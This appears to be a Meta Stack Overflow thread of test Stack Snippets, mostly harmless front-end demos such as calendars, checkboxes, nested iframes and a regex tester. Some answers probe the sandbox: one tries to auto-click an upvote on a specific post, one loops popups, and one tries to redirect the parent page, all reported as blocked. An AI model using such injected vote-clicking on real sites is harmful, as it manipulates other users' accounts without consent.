     for ( i=0 ; i<N ; ++ i ) lm*=mu*(1.0 - lm);
     x=Math.round(mu/DMU);
     for ( i=0 ; i<N ; ++ i ) {
         lm*=mu*(1.0 - lm);
         y=Math.round((1.0 - lm)*H);
         div=document.createElement("div");
         div.style.left=x + "px";
         div.style.top=y + "px";
         div.style.backgroundColor=anyColor(0.0,129.0);
         document.body.appendChild(div);
     }  
 }
 document.body.style.backgroundColor=anyColor(240.0,16.0)   
};
```

```css
div
{
      position:absolute;
         width:2px;
        height:2px;
 border-radius:100%;
}
```

```html
Be patient, please !!!. It's coming.
```

Answer (score 3):

#### FullCalendar plugin. Many external sources.

Testing a recent JSFiddle.
Works exactly the same and looks like *there's no problem with `<link rel="stylesheet" href="SOME-SITE" />`*

```js
$.fn.popover.defaults.container = 'body';

$('#mycalendar').fullCalendar({
    header: {
        left: 'prev,next today',
        center: 'title',
        right: 'agendaWeek,agendaDay'
    },
    eventRender: function (event, element) {
        element.popover({
            title: '<div class="x-fechar" data-eid="'+event._id+'">x</div>',
            placement: 'top',
            html: true,
            content: event.msg
        });
        $element = $(this);
        $(document).on("click", ".x-fechar", function (e) {
            console.dir(event);
            if( $(this).data('eid') == event._id )
                element.popover('hide');
        });
    },
    editable: false,
    events: [{
        title: 'Click me 1',
        msg: 'I am clipped to the left which is annoying',
        start: '2014-09-01 06:00:00',
        end: '2014-09-01 08:00:00',
        editable: false,
        allDay: false
    }, {
        title: 'Click me 2',
        msg: 'I am OK',
        start: '2014-09-04 14:00:00',
        end: '2014-09-04 15:00:00',
        editable: false,
        allDay: false
    }]
});
```

```css
#mycalendar {
    margin:30px;
    height:600px;
    max-width:500px;
}
.x-fechar {
    position: absolute;
    right: 0;
    padding: 6px 6px 0 0;
    margin: -15px 0 0 0;
    cursor: pointer;
}
```

```html
<script type="text/javascript" src="//cdnjs.cloudflare.com/ajax/libs/jquery/2.1.1/jquery.min.js"></script>
<script type="text/javascript" src="http://www.hivemindmap.com/js/fullcalendar.min.js"></script>
<script type="text/javascript" src="http://netdna.bootstrapcdn.com/twitter-bootstrap/2.3.0/js/bootstrap.min.js"></script>
<link rel="stylesheet" href="http://www.hivemindmap.com/css/fullcalendar.css" />
<link rel="stylesheet" href="http://netdna.bootstrapcdn.com/twitter-bootstrap/2.3.0/css/bootstrap-combined.min.css" />
 
<body>
    <div id="mycalendar"> </div>
</body>
```

---

#### Scroll listener. CSS3 animation.

And it works, ladies and gentleman!!

```js
var height;
var available;
var percentage_of_page;
var half_screen;
var open_box = false;

/* Escreve o status do scroll em #scroll-val */
function write_status() {
    // Document minus Viewport
    // http://stackoverflow.com/a/1304384/1287812
    available = $(document).height();// - $(window).height(); 
    percentage_of_page = 0.5;
    half_screen = parseInt( available * percentage_of_page );
    $('#scroll-val').html(height + '/' + available + ' - Aparece em: ' + half_screen);
}

/* Listener do scroll */
$(window).scroll(function (e) {
    height = $(window).scrollTop();
    write_status();
    if ( height > half_screen ) {
        if( !open_box ) {
            open_box = true;
            $('.box').removeClass('motionL').addClass('motionR');
        }
    } else {
        if( !$('.box').hasClass('motionL') ) {
            open_box = false;
            $('.box').removeClass('motionR').addClass('motionL');
        }
    }
});

/* Remover elementos da página para reposicionar o aparecimento do .box */
$('#btn-remove').click(function () {
    $('.aux').last().remove();
    write_status();
    $(this).text('Eliminar div (' + $('.aux').length + ')');
});
```

```css
body, html, .box {
    margin: 0;
}
.box {
    position: fixed;
    width: 293px;
    bottom: 48px;
    right: -384px;
    background-color: #fafafa;
    padding: 16px 25px 0px 25px;
    z-index: 9999;
}
.motionR {
    transition: right 500ms cubic-bezier(0.265, 0.365, 0.26, 0.865);
    right: 0px;
}
.motionL {
    transition: right 500ms cubic-bezier(0.265, 0.365, 0.26, 0.865);
    right: -343px;
}
.aux {
    /* blocos coloridos */
    min-height: 500px;
    width:100%;
    clear:both;
    float:left;
}
.lines {
    /* grid horizontal */
    background-size: 100px 100px;
    background-image:repeating-linear-gradient(0deg, #aaa, #aaa 1px, transparent 1px, transparent 100px);
}
.ye {
    background-color:#ee5;
}
.re {
    background-color:#55e;
}
.bl {
    background-color:#e5e;
}
.text {
    font-family: sans-serif;
    color: #333333;
    font-size: 20px;
}
#remove {
    position: fixed;
    bottom: 0;
    left:0;
    padding: 0 0 10px 20px;
}
#btn-remove {
    font-size:12px
}
#scroll-val {
    position: fixed;
    top: 0;
    right:0;
    padding: 30px 85px 0 0;
}
#scroll-val::before {
    font-size:12px;
    content:'Scroll: ';
}
.box-title {
    font-weight: normal;
    line-height: 30px;
    display: inline-block;
    text-align: center;
    width: 290px;
    margin-bottom: 18px;
}
h3 {
    margin: -5px 0 0 5px;
}
```

```html
<script type="text/javascript" src="//cdnjs.cloudflare.com/ajax/libs/jquery/2.1.1/jquery.min.js"></script>
<link rel="stylesheet" href="http://netdna.bootstrapcdn.com/twitter-bootstrap/2.3.0/css/bootstrap-combined.min.css" />

<!-- botão para remover divs -->
<div id="remove">
    <button id="btn-remove" class="text btn btn-warning btn-mini">Eliminar div (5)</button>
</div>

<!-- status -->
<div id="scroll-val" class="text">.</div>
<!-- blocos de conteúdo -->
<div class="aux ye text lines"><h3>1 - Mostrar box quando scroll atingir 50% da tela</h3></div>
<div class="aux re text lines"><h3>2</h3></div>
<div class="aux bl text lines"><h3>3</h3></div>
<div class="aux ye text lines"><h3>4</h3></div>
<div class="aux re text lines"><h3>5</h3></div>

<!-- div para animar -->
<div class="box"><span class="box-title text label label-info">MORE STORIES</span>

    <div> <a href="#"><img width="326" height="150" src="http://dummyimage.com/326x150/23a343/edfcf7&text=Detect+scroll" class="img-polaroid" /></a>

         <h3><a href="#">Lorem ipsum</a></h3>

        <p class="text-info">Neque porro quisquam est qui dolorem ipsum quia dolor sit amet, consectetur, adipisci velit...</p>
    </div>
</div>
```

Answer (score 3):

Ok funtimes! 
How's a tri-state checkbox for ya?

```js
var inputs = $('.tristate-checkbox'),
    el;

var res = $('#the-form').serialize();
$("#res p").html(res)

inputs.on('click.tristate', function () {
    el = $(this);
    switch (el.data('checked')) {

        // unchecked, going indeterminate
        case -1:
            el.data('checked', 0);
            el.val(0) // so it will send the value
            el.prop('indeterminate', true);
            break;

            // indeterminate, going checked
        case 0:
            el.data('checked', 1);
            el.val(1);
            el.prop('indeterminate', false);
            el.prop('checked', true);
            break;

            // checked, going unchecked
        default:
            el.data('checked', -1);
            el.prop('indeterminate', false);
            el.prop('checked', false);
    }

    var res = $('#the-form').serialize();
    $("#res p").html(res);
});

inputs.each(function () {
    if ($(this).data('checked') === 0) {
        this.indeterminate = true;
        this.value = 0;
        return;
    }
    if (this.checked) $(this).data('checked', 1);
    else              $(this).data('checked', -1);
});
```

```css
* {
    font-family: sans-serif;
}
#res {
    padding: 20px;
}
```

```html
<script src="https://ajax.googleapis.com/ajax/libs/jquery/2.1.1/jquery.min.js"></script>
<form id="the-form">
    <input type="checkbox" name="cb1" class="tristate-checkbox" />
    <input type="checkbox" name="cb2" data-checked="0" class="tristate-checkbox" />
    <input type="checkbox" name="cb3" class="tristate-checkbox" checked="checked" />
</form>
<br>
<div id="res">
     <h3>Result:</h3>
    <p></p>
</div>
```

Answer (score 3):

In relation to my feature request:

### [Stack Overflow / Stack Exchange - Advanced Search](https://meta.stackoverflow.com/questions/270548/stack-overflow-stack-exchange-advanced-search)

I thought I'd post my Advanced Search here too:

### Advanced Search - Meta.SE only (Sandboxed)

```js
$('.btnUpdate').click(

function () {
    var site = document.getElementById('site').value;
    var link = 'http://' + site + '/search?q=';

    if (document.getElementById('tags').value.length > 0) {
        link += document.getElementById('tags').value;
    }

    link = appendLink(link, 'answers', 'answers:');
    link = appendLink(link, 'score', 'score:');
    link = appendLink(link, 'views', 'views:');
    link = appendLink(link, 'created', 'created:');
    link = appendLink(link, 'lastactive', 'lastactive:');
    link = appendLink(link, 'title', 'title:');
    link = appendLink(link, 'body', 'body:');
    link = appendLink(link, 'user', 'user:');
    link = appendLink(link, 'infavorites', 'infavorites:');
    link = appendLink(link, 'intags', 'intags:');    
    link = appendLinkWithBool(link, 'hasaccepted', 'hasaccepted:');    
    link = appendLinkWithBool(link, 'hascode', 'hascode:');    
    link = appendLinkWithBool(link, 'closed', 'closed:');    
    link = appendLinkWithBool(link, 'duplicate', 'duplicate:');    
    link = appendLinkWithBool(link, 'locked', 'locked:');    

    event.preventDefault();
    event.stopPropagation();
    //window.open(link, '_blank');
  
    var frame = document.getElementById('myFrame');
    frame.src = link;
});

function appendLink(link, ctrl, param) {
    if (document.getElementById(ctrl).value.length > 0) {
        return link + '+' + param +     
               document.getElementById(ctrl).value;
    }
    return link;
}

function appendLinkWithBool(link, ctrl, param) {
    if (document.getElementById(ctrl).value !== 'exclude') {
        return link + '+' + param +     
               document.getElementById(ctrl).value;
    }
    return link;
}
```

```css
body, html {
    font-family: Verdana;
    font-size: 10pt;
}
span, input {
    display: block;
}
.split {
    width: 45%; 
    display: inline-block; 
    vertical-align: top;
}
```

```html
<script src="https://ajax.googleapis.com/ajax/libs/jquery/2.1.1/jquery.min.js"></script>
<div>
    <span>Search Site: (without http://)</span><input id='site' type='text' value='meta.stackoverflow.com' />
</div>
<div class="split">
    <h4>Tags</h4>
    <ul>
        <li>Single: [tag-1]</li>
        <li>Multiple AND: [tag-1] and [tag-2]</li>
        <li>Multiple OR: [tag-1] or [tag-2]</li>        
    </ul>  
    <h4>User Operators</h4>
    <ul>
        <li>User: mine, me, or a user id</li>
        <li>In Favorites: mine or a user id</li>
        <li>In Tags: mine </li>   
    </ul>
</div>
<div class="split">
    <h4>Numeric</h4>
    <ul>
        <li>Single value: 50</li>
        <li>Range: 50..75</li>        
    </ul>
    <h4>Dates</h4>
    <ul>
        <li>Year: 2014</li>
        <li>Year and Month: 2014-12</li>
        <li>Full: 2014-12-31</li>    
    </ul>
</div>


<div class="split">    
    <span>Tags: </span><input id='tags' type='text' value='' />
    <span>Title: </span><input id='title' type='text' />
    <span>Body: </span><input id='body' type='text' />    
    <span>Answers: </span><input id='answers' type='text' value='0' />
    <span>Score: </span><input id='score' type='text' value='1'/>
    <span>Views: </span><input id='views' type='text' value='' />    
    <span>Created:</span><input id='created' type='text' value='2014-09' />
    <span>Last Active:</span><input id='lastactive' type='text' value='' />        
</div>
<div class="split">        
    <span>User: </span><input id='user' type='text' value='' />
    <span>In Favourites: </span><input id='infavorites' type='text' value='' />
    <span>In Tags: </span><input id='intags' type='text' value='mine' />            
    <span>Has Accepted Answer:</span>
    <select id='hasaccepted'>      
      <option value='exclude'></option>
      <option value='true'>true</option>
      <option value='false'>false</option>
    </select>
    <span>Has Code:</span>
    <select id='hascode'>      
      <option value='exclude'></option>
      <option value='true'>true</option>
      <option value='false'>false</option>
    </select>
    <span>Closed:</span>
    <select id='closed'>      
      <option value='exclude'></option>
      <option value='true'>true</option>
      <option value='false'>false</option>
    </select>
    <span>Duplicate:</span>
    <select id='duplicate'>      
      <option value='exclude'></option>
      <option value='true'>true</option>
      <option value='false'>false</option>
    </select>
    <span>Locked:</span>
    <select id='locked'>      
      <option value='exclude'></option>
      <option value='true'>true</option>
      <option value='false'>false</option>
    </select>
    <input type='button' value='Show me the Posts' class='btnUpdate'/>
</div>

<iframe id="myFrame" src="http://meta.stackoverflow.com" sandbox="allow-same-origin" style="width: 100%; height: 600px;">
</iframe>
```

Answer (score 3):

[Sandbox the console separately?](https://meta.stackoverflow.com/questions/339480/sandbox-the-console-separately)

```js
console.log("Nice");
```

```css
div {
  background-color: #333;
  background-image: url('http://www.wearewebstars.dk/codepen/img/s1.png'), url('http://www.wearewebstars.dk/codepen/img//s2.png'), url('http://www.wearewebstars.dk/codepen/img//s3.png');
  line-height: 15;
  -webkit-animation: snow 15s linear infinite;
  -moz-animation: snow 15s linear infinite;
  -ms-animation: snow 15s linear infinite;
  animation: snow 15s linear infinite;
  max-height: 500px !important;
  color: white;
}
@keyframes snow {
  0% {
    background-position: 0px 0px, 0px 0px, 0px 0px;
  }
  50% {
    background-position: 500px 500px, 100px 200px, -100px 150px;
  }
  100% {
    background-position: 500px 1000px, 200px 400px, -100px 300px;
  }
}
@-moz-keyframes snow {
  0% {
    background-position: 0px 0px, 0px 0px, 0px 0px;
  }
  50% {
    background-position: 500px 500px, 100px 200px, -100px 150px;
  }
  100% {
    background-position: 400px 1000px, 200px 400px, 100px 300px;
  }
}
@-webkit-keyframes snow {
  0% {
    background-position: 0px 0px, 0px 0px, 0px 0px;
  }
  50% {
    background-position: 500px 500px, 100px 200px, -100px 150px;
  }
  100% {
    background-position: 500px 1000px, 200px 400px, -100px 300px;
  }
}
@-ms-keyframes snow {
  0% {
    background-position: 0px 0px, 0px 0px, 0px 0px;
  }
  50% {
    background-position: 500px 500px, 100px 200px, -100px 150px;
  }
  100% {
    background-position: 500px 1000px, 200px 400px, -100px 300px;
  }
}
```

Answer (score 3):

## Meta-iframes - iframes within iframes

You can go (at least)  <s>4</s>   <s>7</s>   <s>10</s>  13 levels deep.

Each iframe's complete document is included in the `srcdoc` attribute.  Double-quotes must be HTML-escaped as entities: `"` -> `&quot;`.  The next levels of nesting require the angle-brackets to be HTML-escaped as entities as well: `<` -> `&lt;`, `>` -> `&gt;`.  Each successive level of <s>inception</s>nesting requires the ampersands from each HTML-escape to be themselves HTML-escaped:

- `&quot;` -> `&amp;quot;` -> `&amp;amp;quot` -> ...
- `&lt;` -> `&amp;lt;` -> `&amp;amp;lt` -> ...
- `&gt;` -> `&amp;gt;` -> `&amp;amp;gt` -> ...

```html
<h1 style="text-align: center">Snippet Iframe</h1>
<iframe width="100%" height="100%" style="text-align: center" srcdoc="
  <h1 style=&quot;text-align: center&quot;>Inner Iframe 1</h1>
  <iframe width=&quot;100%&quot; height=&quot;100%&quot; srcdoc=&quot;
  &lt;h1 style=&amp;quot;text-align: center&amp;quot;&gt;Inner Iframe 2&lt;/h1&gt;
  &lt;iframe width=&amp;quot;100%&amp;quot; height=&amp;quot;100%&amp;quot; srcdoc=&amp;quot;
    &amp;lt;h1 style=&amp;amp;quot;text-align: center&amp;amp;quot;&amp;gt;Inner Iframe 3&amp;lt;/h1&amp;gt;
    &amp;lt;iframe width=&amp;amp;quot;100%&amp;amp;quot; height=&amp;amp;quot;100%&amp;amp;quot; srcdoc=&amp;amp;quot;
      &amp;amp;lt;h1 style=&amp;amp;amp;quot;text-align: center;&amp;amp;amp;quot;&amp;amp;gt;Inner Iframe 4&amp;amp;lt;/h1&amp;amp;gt;
      &amp;amp;lt;iframe width=&amp;amp;amp;quot;100%&amp;amp;amp;quot; height=&amp;amp;amp;quot;100%&amp;amp;amp;quot; srcdoc=&amp;amp;amp;quot;
        &amp;amp;amp;lt;h1 style=&amp;amp;amp;amp;quot;text-align: center;&amp;amp;amp;amp;quot;&amp;amp;amp;gt;Inner Iframe 5&amp;amp;amp;lt;/h1&amp;amp;amp;gt;
        &amp;amp;amp;lt;iframe width=&amp;amp;amp;amp;quot;100%&amp;amp;amp;amp;quot; height=&amp;amp;amp;amp;quot;100%&amp;amp;amp;amp;quot; srcdoc=&amp;amp;amp;amp;quot;
          &amp;amp;amp;amp;lt;h1 style=&amp;amp;amp;amp;amp;quot;text-align: center;&amp;amp;amp;amp;amp;quot;&amp;amp;amp;amp;gt;Inner Iframe 6&amp;amp;amp;amp;lt;/h1&amp;amp;amp;amp;gt;
          &amp;amp;amp;amp;lt;iframe width=&amp;amp;amp;amp;amp;quot;100%&amp;amp;amp;amp;amp;quot; height=&amp;amp;amp;amp;amp;quot;100%&amp;amp;amp;amp;amp;quot; srcdoc=&amp;amp;amp;amp;amp;quot;
            &amp;amp;amp;amp;amp;lt;h1 style=&amp;amp;amp;amp;amp;amp;quot;text-align: center;&amp;amp;amp;amp;amp;amp;quot;&amp;amp;amp;amp;amp;gt;Inner Iframe 7&amp;amp;amp;amp;amp;lt;/h1&amp;amp;amp;amp;amp;gt;
            &amp;amp;amp;amp;amp;lt;iframe width=&amp;amp;amp;amp;amp;amp;quot;100%&amp;amp;amp;amp;amp;amp;quot; height=&amp;amp;amp;amp;amp;amp;quot;100%&amp;amp;amp;amp;amp;amp;quot; srcdoc=&amp;amp;amp;amp;amp;amp;quot;
              &amp;amp;amp;amp;amp;amp;lt;h1 style=&amp;amp;amp;amp;amp;amp;amp;quot;text-align: center;&amp;amp;amp;amp;amp;amp;amp;quot;&amp;amp;amp;amp;amp;amp;gt;Inner Iframe 8&amp;amp;amp;amp;amp;amp;lt;/h1&amp;amp;amp;amp;amp;amp;gt;
              &amp;amp;amp;amp;amp;amp;lt;iframe width=&amp;amp;amp;amp;amp;amp;amp;quot;100%&amp;amp;amp;amp;amp;amp;amp;quot; height=&amp;amp;amp;amp;amp;amp;amp;quot;100%&amp;amp;amp;amp;amp;amp;amp;quot; srcdoc=&amp;amp;amp;amp;amp;amp;amp;quot;
                &amp;amp;amp;amp;amp;amp;amp;lt;h1 style=&amp;amp;amp;amp;amp;amp;amp;amp;quot;text-align: center;&amp;amp;amp;amp;amp;amp;amp;amp;quot;&amp;amp;amp;amp;amp;amp;amp;gt;Inner Iframe 9&amp;amp;amp;amp;amp;amp;amp;lt;/h1&amp;amp;amp;amp;amp;amp;amp;gt;
                &amp;amp;amp;amp;amp;amp;amp;lt;iframe width=&amp;amp;amp;amp;amp;amp;amp;amp;quot;100%&amp;amp;amp;amp;amp;amp;amp;amp;quot; height=&amp;amp;amp;amp;amp;amp;amp;amp;quot;100%&amp;amp;amp;amp;amp;amp;amp;amp;quot; srcdoc=&amp;amp;amp;amp;amp;amp;amp;amp;quot;
                  &amp;amp;amp;amp;amp;amp;amp;amp;lt;h1 style=&amp;amp;amp;amp;amp;amp;amp;amp;amp;quot;text-align: center;&amp;amp;amp;amp;amp;amp;amp;amp;amp;quot;&amp;amp;amp;amp;amp;amp;amp;amp;gt;Inner Iframe 10&amp;amp;amp;amp;amp;amp;amp;amp;lt;/h1&amp;amp;amp;amp;amp;amp;amp;amp;gt;
      &amp;amp;amp;amp;amp;amp;amp;amp;lt;iframe width=&amp;amp;amp;amp;amp;amp;amp;amp;amp;quot;100%&amp;amp;amp;amp;amp;amp;amp;amp;amp;quot; height=&amp;amp;amp;amp;amp;amp;amp;amp;amp;quot;100%&amp;amp;amp;amp;amp;amp;amp;amp;amp;quot; srcdoc=&amp;amp;amp;amp;amp;amp;amp;amp;amp;quot;
                    &amp;amp;amp;amp;amp;amp;amp;amp;amp;lt;h1 style=&amp;amp;amp;amp;amp;amp;amp;amp;amp;amp;quot;text-align: center;&amp;amp;amp;amp;amp;amp;amp;amp;amp;amp;quot;&amp;amp;amp;amp;amp;amp;amp;amp;amp;gt;Inner Iframe 11&amp;amp;amp;amp;amp;amp;amp;amp;amp;lt;/h1&amp;amp;amp;amp;amp;amp;amp;amp;amp;gt;
     &amp;amp;amp;amp;amp;amp;amp;amp;amp;lt;iframe width=&amp;amp;amp;amp;amp;amp;amp;amp;amp;amp;quot;100%&amp;amp;amp;amp;amp;amp;amp;amp;amp;amp;quot; height=&amp;amp;amp;amp;amp;amp;amp;amp;amp;amp;quot;100%&amp;amp;amp;amp;amp;amp;amp;amp;amp;amp;quot; srcdoc=&amp;amp;amp;amp;amp;amp;amp;amp;amp;amp;quot;
                      &amp;amp;amp;amp;amp;amp;amp;amp;amp;amp;lt;h1 style=&amp;amp;amp;amp;amp;amp;amp;amp;amp;amp;amp;quot;text-align: center;&amp;amp;amp;amp;amp;amp;amp;amp;amp;amp;amp;quot;&amp;amp;amp;amp;amp;amp;amp;amp;amp;amp;gt;Inner Iframe 12&amp;amp;amp;amp;amp;amp;amp;amp;amp;amp;lt;/h1&amp;amp;amp;amp;amp;amp;amp;amp;amp;amp;gt;
       &amp;amp;amp;amp;amp;amp;amp;amp;amp;amp;lt;iframe width=&amp;amp;amp;amp;amp;amp;amp;amp;amp;amp;amp;quot;100%&amp;amp;amp;amp;amp;amp;amp;amp;amp;amp;amp;quot; height=&amp;amp;amp;amp;amp;amp;amp;amp;amp;amp;amp;quot;100%&amp;amp;amp;amp;amp;amp;amp;amp;amp;amp;amp;quot; srcdoc=&amp;amp;amp;amp;amp;amp;amp;amp;amp;amp;amp;quot;
                        &amp;amp;amp;amp;amp;amp;amp;amp;amp;amp;amp;lt;h1 style=&amp;amp;amp;amp;amp;amp;amp;amp;amp;amp;amp;amp;quot;text-align: center;&amp;amp;amp;amp;amp;amp;amp;amp;amp;amp;amp;amp;quot;&amp;amp;amp;amp;amp;amp;amp;amp;amp;amp;amp;gt;Inner Iframe 13&amp;amp;amp;amp;amp;amp;amp;amp;amp;amp;amp;lt;/h1&amp;amp;amp;amp;amp;amp;amp;amp;amp;amp;amp;gt;
                      &amp;amp;amp;amp;amp;amp;amp;amp;amp;amp;amp;quot;&amp;amp;amp;amp;amp;amp;amp;amp;amp;amp;gt;
                      &amp;amp;amp;amp;amp;amp;amp;amp;amp;amp;lt;/iframe&amp;amp;amp;amp;amp;amp;amp;amp;amp;amp;gt;
                    &amp;amp;amp;amp;amp;amp;amp;amp;amp;amp;quot;&amp;amp;amp;amp;amp;amp;amp;amp;amp;gt;
                    &amp;amp;amp;amp;amp;amp;amp;amp;amp;lt;/iframe&amp;amp;amp;amp;amp;amp;amp;amp;amp;gt;
                  &amp;amp;amp;amp;amp;amp;amp;amp;amp;quot;&amp;amp;amp;amp;amp;amp;amp;amp;gt;
                  &amp;amp;amp;amp;amp;amp;amp;amp;lt;/iframe&amp;amp;amp;amp;amp;amp;amp;amp;gt;
                &amp;amp;amp;amp;amp;amp;amp;amp;quot;&amp;amp;amp;amp;amp;amp;amp;gt;
                &amp;amp;amp;amp;amp;amp;amp;lt;/iframe&amp;amp;amp;amp;amp;amp;amp;gt;
              &amp;amp;amp;amp;amp;amp;amp;quot;&amp;amp;amp;amp;amp;amp;gt;
              &amp;amp;amp;amp;amp;amp;lt;/iframe&amp;amp;amp;amp;amp;amp;gt;
            &amp;amp;amp;amp;amp;amp;quot;&amp;amp;amp;amp;amp;gt;
            &amp;amp;amp;amp;amp;lt;/iframe&amp;amp;amp;amp;amp;gt;
          &amp;amp;amp;amp;amp;quot;&amp;amp;amp;amp;gt;
          &amp;amp;amp;amp;lt;/iframe&amp;amp;amp;amp;gt;
        &amp;amp;amp;amp;quot;&amp;amp;amp;gt;
        &amp;amp;amp;lt;/iframe&amp;amp;amp;gt;
      &amp;amp;amp;quot;&amp;amp;gt;
      &amp;amp;lt;/iframe&amp;amp;gt;
    &amp;amp;quot;&amp;gt;
    &amp;lt;/iframe&amp;gt;
  &amp;quot;&gt;
  &lt;/iframe&gt;
&quot;>
  </iframe>
  ">
</iframe>
```

Answer (score 3):

I'm debugging a Stack Snippet.

```html
<iframe src="https://ppcg-leaderboard.xmikee.repl.co" width="100%" height="100%" style="border: none;">Oops, your browser is too old to view this content! Please upgrade to a newer version of your browser that supports HTML5.</iframe><style>html,body{margin:0;padding:0;height:100%;overflow:hidden}</style>
```

Answer (score 3):

[create-react-app](https://github.com/facebook/create-react-app) in SO code snippet

Use this template in your React posts!

```js
const {useState, useEffect} = React;

const App = () => {
  return (
    <div className="App">
      <header className="App-header">
        <img src="https://upload.wikimedia.org/wikipedia/commons/a/a7/React-icon.svg" className="App-logo" alt="logo" />
        <p>
          Edit code snippet and click ▶️ Run to reload.
        </p>
        <a
          className="App-link"
          href="https://reactjs.org"
          target="_blank"
          rel="noopener noreferrer"
        >
          Learn React
        </a>
      </header>
    </div>
  );
};

class Root extends React.Component {
  render() {
    return (
      <App/>
    );
  }
}

ReactDOM.render(<Root />, document.getElementById('root'));
```

```css
body {
  margin: 0;
  font-family: -apple-system, BlinkMacSystemFont, 'Segoe UI', 'Roboto', 'Oxygen',
    'Ubuntu', 'Cantarell', 'Fira Sans', 'Droid Sans', 'Helvetica Neue',
    sans-serif;
  -webkit-font-smoothing: antialiased;
  -moz-osx-font-smoothing: grayscale;
}

code {
  font-family: source-code-pro, Menlo, Monaco, Consolas, 'Courier New',
    monospace;
}
.App {
  text-align: center;
}

.App-logo {
  height: 40vmin;
  pointer-events: none;
}

@media (prefers-reduced-motion: no-preference) {
  .App-logo {
    animation: App-logo-spin infinite 20s linear;
  }
}

.App-header {
  background-color: #282c34;
  min-height: 100vh;
  display: flex;
  flex-direction: column;
  align-items: center;
  justify-content: center;
  font-size: calc(10px + 2vmin);
  color: white;
}

.App-link {
  color: #61dafb;
}

@keyframes App-logo-spin {
  from {
    transform: rotate(0deg);
  }
  to {
    transform: rotate(360deg);
  }
}
```

```html
<script src="https://unpkg.com/react@16/umd/react.development.js" crossorigin></script>
  <script src="https://unpkg.com/react-dom@16/umd/react-dom.development.js" crossorigin></script>
<div id="root">
</div>
```

Answer (score 3):

```js
const date = new Date(2010, 7, 5)
const dateTimeFormat = new Intl.DateTimeFormat('en', { year: 'numeric', month: 'short', day: '2-digit' }) 
const [{ value: month },,{ value: day },,{ value: year }] = dateTimeFormat .formatToParts(date ) 
console.log(`${day}-${month}-${year }`)
```

Comment: Funny watching `:` blinks

Answer (score 3):

I was curious if it would be possible for a snippet to manipulate the page's UI.

Let's give it a shot:

```js
$('body').css({
  transition: 'all 1s ease',
  transform: 'skew(0, 15deg)'
});

setTimeout(() => {
  $('body').css({
    transform: 'skew(0, 0)'
  });
}, 15000);

// Or something more nefarious?
$('[data-post-id="401649"] .js-vote-up-btn').click();
```

```html
<script src="https://cdnjs.cloudflare.com/ajax/libs/jquery/3.3.1/jquery.min.js"></script>
```

Comment: Turns out the answer is no, when embedded in an answer.

Answer (score 3):

Here's a code snippet where we change code languages, in the middle of a code block. Can anyone tell how we did it?

```js
// some harmless javascript...

document.querySelector("p.wow").style.border = "10px solid orange";

// </script>

<p>Yay! Trees are green.</p>
```

```css
/* just some harmless css... */
p {
    color: red;
    background: black;
}
body {
    background: lightblue;
}
/* </style>
<!-- and look, now we have html! -->
<p class="wow">That was a big bus.</p>
```

```html
<p>Hi. Purple </p>
```

Comment: This seemed weird until I saw the `// <script>`

Answer (score 2):

This probably don't matter since most everyone has pop-up block.

```js
for (var x=0; x<5; x++) {
  window.open('https://stackoverflow.com', '_blank');
}
```

Comment: My console said *Blocked opening 'https://stackoverflow.com/' in a new window because the request was made in a sandboxed frame whose 'allow-popups' permission is not set.*

Comment: Doesn't load anything. Chrome tells me when something is blocked, and I didn't get any dialog.

Comment: With popups blocked, nothing happens (obviously). With popups *un*-blocked, I get these errors: `[Error] SecurityError: DOM Exception 18: An attempt was made to break through the security policy of the user agent.
[Error] Blocked opening 'https://stackoverflow.com/' in a new window because the request was made in a sandboxed frame whose 'allow-popups' permission is not set.`

Answer (score 2):

You can create some simple snippet, can you **edit** it afterwards?

```js
window.onload = function() {
var primes = []
for (var i=2;i<1000;i++) {
  var is_prime = true
  for (var j in primes) {
    var dvd = i / primes[j]
    if (dvd == Math.ceil(dvd)) {
      is_prime = false
      break
    }    
  }
  if (is_prime) {
    primes.push(i)
  }
}
document.getElementById('content').innerHTML = primes.toString()
}
```

```css
#title {
 font-size: 14;
 font-weight: bold;
}
```

```html
<div id="title">Snippet testing</div>
<div id="content">Edited for testing</div>
```

Comment: You're able to edit it in the normal editor view. But it doesn't copy of over when you click on the code snippet button.

Answer (score 2):

Reload current page example - not work here, for the moment.

Error Message:

> Uncaught SecurityError: Sandbox access violation: Blocked a frame at
>   "http://stacksnippets.net" from accessing a frame at
>   "http://meta.stackoverflow.com".  The frame requesting access is
>   sandboxed and lacks the "allow-same-origin" flag.

```js
function  ReloadPage()
{
    // not allowed any of that
    console.log(top.location.href)  ;
    top.location.replace( updateURLParameter(top.location.href, "_rnd", Math.random()) );
    return false;
}
//
// this function is an improved version of
// http://stackoverflow.com/a/10997390/159270
//
function updateURLParameter(url, param, paramVal)
{
    var TheAncor = null;
    var newAdditionalURL = "";
    var tempArray = url.split("?");
    var baseURL = tempArray[0];
    var additionalURL = tempArray[1];
    var temp = "";

    if (additionalURL) 
    {
        var tmpAncor = additionalURL.split("#");
        var TheParams = tmpAncor[0];
            TheAncor = tmpAncor[1];
        if(TheAncor)
            additionalURL = TheParams;

        tempArray = additionalURL.split("&");

        for (i=0; i<tempArray.length; i++)
        {
            if(tempArray[i].split('=')[0] != param)
            {
                newAdditionalURL += temp + tempArray[i];
                temp = "&";
            }
        }        
    }
    else
    {
        var tmpAncor = baseURL.split("#");
        var TheParams = tmpAncor[0];
            TheAncor  = tmpAncor[1];

        if(TheParams)
            baseURL = TheParams;
    }

    if(TheAncor)
        paramVal += "#" + TheAncor;

    var rows_txt = temp + "" + param + "=" + paramVal;
    return baseURL + "?" + newAdditionalURL + rows_txt;
}
```

```html
<script type="text/javascript" src="https://ajax.googleapis.com/ajax/libs/jquery/1.11.1/jquery.min.js"></script>

  
<a href="#" onclick="return ReloadPage();">reload page</a>
```

Answer (score 2):

This is really primitive. I'm sure others can do much better, but it's a minimal regex fiddle.

```js
function run() {
  var regex = document.getElementById('regex').value;
  var haystack = document.getElementById('haystack').value;
  var ul = document.getElementById('results');
  var re = new RegExp(regex);
  var match = re.exec(haystack);
  if (match) {
    ul.innerHTML = '<li>' + match + '</li>';
  } else {
    ul.innerHTML = '<li class="missed">no match</li>';
  }
}
```

```css
label {
  font-weight: bold;
}

div {
  float: left;
}

ul {
  list-style-type: none;
  margin: 0; padding: 2em;
}

li.missed {
  font-style: italic;
  color: green;
}
```

```html
<div>
  <label for="regex">Regex:</label>
  <input type="text" id="regex" name="regex" value="t[aeiou]\s+m\w+h" size="40" style="padding: 4px;">
  <input type="button" id="run" value="Run" onclick="run()">
  <br>
  <textarea rows="4" cols="50" id="haystack" name="haystack">Enter text to match.</textarea>
</div>

<div>
  <ul id="results">
    <li>to match</li>
  </ul>
</div>
```

Answer (score 2):

